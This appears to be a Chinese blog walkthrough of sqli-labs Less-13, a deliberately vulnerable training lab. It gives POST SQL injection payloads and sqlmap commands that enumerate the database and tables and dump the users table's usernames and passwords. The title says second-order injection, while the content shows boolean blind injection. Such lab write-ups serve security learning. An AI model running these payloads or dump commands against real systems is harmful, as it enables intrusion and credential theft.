sql二次注入-sqli-labs第13关

获取数据操作

判断所查询数据库中包含的列数

采用post进行参数输入:

image-20211103204742774

image-20211103204845954

image-20211103204902840

uname=') order by 3 -- - &passwd=') -- -

通过对查询结果进行排序,发现无法对第三列进行排序,且报错Unknown column ‘3’ in ‘order clause’,则说明所查询数据库中共有两列数据。

判断输出数据与数据库的联系


image-20211103205235809

输入语句 uname=') or 1=1 -- - &passwd=') -- - 可发现界面只有登录成功的提示,则说明该网站为盲注,则可利用sqlmap进行bool盲注。

爆破数据库名字

sqlmap.py -u http://sqli/Less-13/ --data "uname=1&passwd=11" --current-db

-u 后面的参数为要爆破的网站;–data 后面加入的参数为网站传入的数据,get和post的访问方式均可用–data进行传参;–current-db意思是通过枚举爆破出当前数据库的名字。

image-20211104152259255

得出当前网站使用的数据库为“security”。

爆破数据库的表名


sqlmap.py -u http://sqli/Less-13/ --data "uname=1&passwd=1" -D "security" --tables

-D后面的参数意思为,爆破的网站的数据库为“security”,–tables意思为列举当前数据库的所有表。

image-20211104152448815

得出当前数据库中的表名。

爆破表users中的列名


sqlmap.py -u http://sqli/Less-13/ --data "uname=1&passwd=1" -D "security" -T "users" --columns

-T后面参数意思为爆破的表名为“users”。

image-20211104152643520

得出“users”表中的列数,可以看见含有password和username列。

爆破users表中的password列和username列


sqlmap.py -u http://sqli/Less-13/ --data "uname=1&passwd=1" -D "security" -T "users" -C username --dump

-C后面加入的参数为要查询的列名,–dump作用为显示结果,如果不加的话,会显示不出来(我也不知道为啥=-=)

image-20211104154059858

查询出username结果。

sqlmap.py -u http://sqli/Less-13/ --data "uname=1&passwd=1" -D "security" -T "users" -C password --dump

查询password:

image-20211104153859669

查询出password结果。

  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

学编程的小w

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值